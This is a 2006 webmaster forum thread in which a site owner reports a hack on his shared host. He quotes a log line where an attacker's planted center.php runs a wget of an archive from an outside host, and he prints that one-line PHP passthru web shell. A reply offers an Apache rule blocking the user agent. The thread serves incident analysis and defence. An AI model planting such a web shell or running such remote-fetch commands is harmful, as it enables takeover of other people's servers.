Forum Moderators: open

Message Too Old, No Replies

InfoPath.1

Revisited

         

smells so good

11:31 pm on Oct 5, 2006 (gmt 0)

10+ Year Member



There are several earlier threads about this UA. Recently, I found it to be associated with a site hack.

202.62.19.*** - - [27/Sep/2006:09:11:31 -0700] "GET /center.php?cmd=wget%20http://ncua.idv.tw/nuke/cache/dalnet.tgz HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"

I cannot find when or where the two scripts, a.php and center.php, were installed in my root directory, but over a couple of days someone was pretty active snnoping around my configuration files.

center.php is a passthru function.

<?
passthru($cmd);
?>

a.php is busy trying to find out everything that it can about the server and its configuration.

I don't know everyone that uses this particular UA is a hacker, but it gets a permanent ban on my site. I'm on a shared host, and I cannot completely discount the possibility that my passwords were hacked. But since I can't find where these files were PUT in my root, I suspect another account on the host was hacked.

[edited by: volatilegx at 12:54 am (utc) on Oct. 6, 2006]
[edit reason] obfuscated ip address [/edit]

wilderness

5:03 am on Oct 6, 2006 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



in the old INFO threads a user added that this was stamp for a browser plug-in, athough no URL was provided in support.

If it's not within your goals to deny the entire 202?
Here's a solution for Info from 202's

RewriteCond %{HTTP_USER_AGENT} InfoPath
RewriteCond %{REMOTE_ADDR} ^202\.
RewriteRule .* - [F]